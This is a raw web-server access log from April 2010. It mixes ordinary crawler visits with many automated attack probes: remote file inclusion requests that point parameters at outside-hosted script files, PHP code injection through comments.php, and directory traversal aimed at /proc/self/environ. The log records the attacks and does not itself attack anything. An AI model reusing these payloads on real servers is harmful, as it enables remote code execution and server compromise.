207.46.204.197 - - [25/Apr/2010:01:52:26 -0500] "GET /logs/access_log.1261612800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.201.34.227 - - [25/Apr/2010:02:05:45 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:05:54 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:06:28 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
207.46.13.133 - - [25/Apr/2010:02:06:54 -0500] "GET /logs/access_log.1176163200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.201.34.227 - - [25/Apr/2010:02:06:54 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
211.203.180.144 - - [25/Apr/2010:02:07:43 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:02:07:43 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.79"
207.46.13.90 - - [25/Apr/2010:02:09:55 -0500] "GET /logs/access_log.1258675200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.201.34.227 - - [25/Apr/2010:02:10:05 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:10:05 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:10:05 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:10:53 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
222.231.60.209 - - [25/Apr/2010:02:12:14 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://www.katalog.oswiata.org.pl/thumbnails/hilang1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:02:12:14 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.katalog.oswiata.org.pl/thumbnails/hilang1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:02:12:14 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.katalog.oswiata.org.pl/thumbnails/hilang1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.249.71.36 - - [25/Apr/2010:02:14:22 -0500] "GET /costume/index1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.201.34.227 - - [25/Apr/2010:02:15:46 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:15:46 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:15:46 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:02:17:19 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
222.231.60.209 - - [25/Apr/2010:02:20:13 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://www.katalog.oswiata.org.pl/thumbnails/hilang1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
84.40.30.37 - - [25/Apr/2010:02:23:10 -0500] "GET /index.php?content=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [25/Apr/2010:02:23:10 -0500] "GET /logs/access_log.1270684800/index.php?content=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [25/Apr/2010:02:23:10 -0500] "GET /logs/index.php?content=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [25/Apr/2010:02:23:16 -0500] "GET /logs/access_log.1270684800/index.php?content=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [25/Apr/2010:02:23:16 -0500] "GET /index.php?content=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [25/Apr/2010:02:23:16 -0500] "GET /logs/index.php?content=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.195.112.180 - - [25/Apr/2010:02:29:08 -0500] "GET /logs/access_log.1234396800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [25/Apr/2010:02:30:21 -0500] "GET /tattoo/links.htm HTTP/1.0" 200 1325 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.232 - - [25/Apr/2010:02:30:24 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.13 - - [25/Apr/2010:02:33:52 -0500] "GET /////delete.php?board.skin.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:33:52 -0500] "GET /logs/access_log.1219795200%20%20/////delete.php?board.skin.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:33:52 -0500] "GET /logs/////delete.php?board.skin.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.46.13.51 - - [25/Apr/2010:02:33:55 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.52.150.147 - - [25/Apr/2010:02:38:49 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
72.52.150.147 - - [25/Apr/2010:02:38:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
72.52.150.147 - - [25/Apr/2010:02:38:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
78.137.163.133 - - [25/Apr/2010:02:38:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [25/Apr/2010:02:38:57 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
72.52.150.147 - - [25/Apr/2010:02:39:05 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.waterdistrict2.com/poll/.logs?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.217.216.132 - - [25/Apr/2010:02:40:48 -0500] "GET /logs/access_log.1268611200%20%20//bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:02:40:48 -0500] "GET //bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:02:40:49 -0500] "GET /logs/access_log.1270684800%20%20//bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:02:40:49 -0500] "GET //bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:02:40:50 -0500] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:02:40:51 -0500] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:02:40:51 -0500] "GET /logs/access_log.1268611200%20%20//bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:02:40:52 -0500] "GET /logs/access_log.1270684800%20%20//bbs/write_comment_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.159.31.10 - - [25/Apr/2010:02:44:51 -0500] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=id? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.159.31.10 - - [25/Apr/2010:02:44:51 -0500] "GET //lib/Loggix/Module/Calendar.php?pathToIndex=id? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
207.46.199.200 - - [25/Apr/2010:02:44:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [25/Apr/2010:02:46:18 -0500] "GET /logs/access_log.1220054400//components/com_simpleboard/file_upload.php?sbp=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:02:46:18 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:02:46:18 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:02:46:27 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:02:46:27 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [25/Apr/2010:02:46:27 -0500] "GET /logs/access_log.1220054400//components/com_simpleboard/file_upload.php?sbp=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:46:35 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:46:35 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:46:35 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 200 3098 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:48:53 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:48:53 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:48:53 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:49:00 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:49:00 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 200 3098 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:49:00 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:49:06 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 3098 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:49:06 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:02:49:06 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
94.102.1.206 - - [25/Apr/2010:02:51:58 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.102.1.206 - - [25/Apr/2010:02:51:58 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.102.1.206 - - [25/Apr/2010:02:51:58 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:10 -0500] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:10 -0500] "GET /logs/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:10 -0500] "GET /logs/access_log.1219708800/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:11 -0500] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:11 -0500] "GET /logs/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:11 -0500] "GET /logs/access_log.1219708800/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:11 -0500] "GET /logs/access_log.1219708800/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:11 -0500] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:11 -0500] "GET /logs/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:13 -0500] "GET /logs/access_log.1219708800/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:13 -0500] "GET /logs/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:57:13 -0500] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 317 "-""Mozilla/5.0"
94.102.1.206 - - [25/Apr/2010:02:57:19 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.102.1.206 - - [25/Apr/2010:02:57:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.102.1.206 - - [25/Apr/2010:02:57:20 -0500] "GET /logs/access_log.1219708800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:58:20 -0500] "GET /samPHPweb//common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:58:20 -0500] "GET /logs/samPHPweb//common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:02:58:20 -0500] "GET /logs/access_log.1226188800/samPHPweb//common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:08 -0500] "GET /logs/access_log.1266710400/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:08 -0500] "GET /logs/access_log.1262563200/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:08 -0500] "GET /logs/access_log.1262563200/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:08 -0500] "GET /logs/access_log.1266710400/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:13 -0500] "GET /logs/access_log.1262563200/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:14 -0500] "GET /logs/access_log.1266710400/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:23 -0500] "GET /logs/access_log.1266710400/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.127.209.52 - - [25/Apr/2010:02:59:23 -0500] "GET /logs/access_log.1262563200/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 344 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:05:17 -0500] "GET /include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:05:17 -0500] "GET /logs/access_log.1262822400/include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:05:17 -0500] "GET /logs/include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:06:14 -0500] "GET /logs/include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:06:14 -0500] "GET /logs/access_log.1262822400/include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.159.31.10 - - [25/Apr/2010:03:06:16 -0500] "GET //obj/action.class.php?path_om=id? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
119.235.18.81 - - [25/Apr/2010:03:06:17 -0500] "GET /include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:07:07 -0500] "GET /include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:07:08 -0500] "GET /logs/include/global.php?GLOBALS[includeBit]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:08:49 -0500] "GET /include/global.php?GLOBALS[includeBit]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:08:49 -0500] "GET /logs/include/global.php?GLOBALS[includeBit]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.235.18.81 - - [25/Apr/2010:03:08:49 -0500] "GET /logs/access_log.1262822400/include/global.php?GLOBALS[includeBit]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.159.31.10 - - [25/Apr/2010:03:12:13 -0500] "GET /logs/access_log.1217462400//obj/action.class.php?path_om=id? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
67.159.31.10 - - [25/Apr/2010:03:12:13 -0500] "GET //obj/action.class.php?path_om=id? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
67.159.31.10 - - [25/Apr/2010:03:12:13 -0500] "GET /logs//obj/action.class.php?path_om=id? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
119.235.18.81 - - [25/Apr/2010:03:12:41 -0500] "GET /logs/include/global.php?GLOBALS[includeBit]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
65.55.207.23 - - [25/Apr/2010:03:12:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.203.180.144 - - [25/Apr/2010:03:16:33 -0500] "GET /logs/access_log.1268611200//language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:03:16:33 -0500] "GET /logs/access_log.1268611200//language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:03:16:33 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:03:16:33 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:03:16:34 -0500] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.79"
211.203.180.144 - - [25/Apr/2010:03:16:34 -0500] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.79"
78.49.174.192 - - [25/Apr/2010:03:19:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
211.203.180.144 - - [25/Apr/2010:03:20:54 -0500] "GET /logs/access_log.1212105600//language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.79"
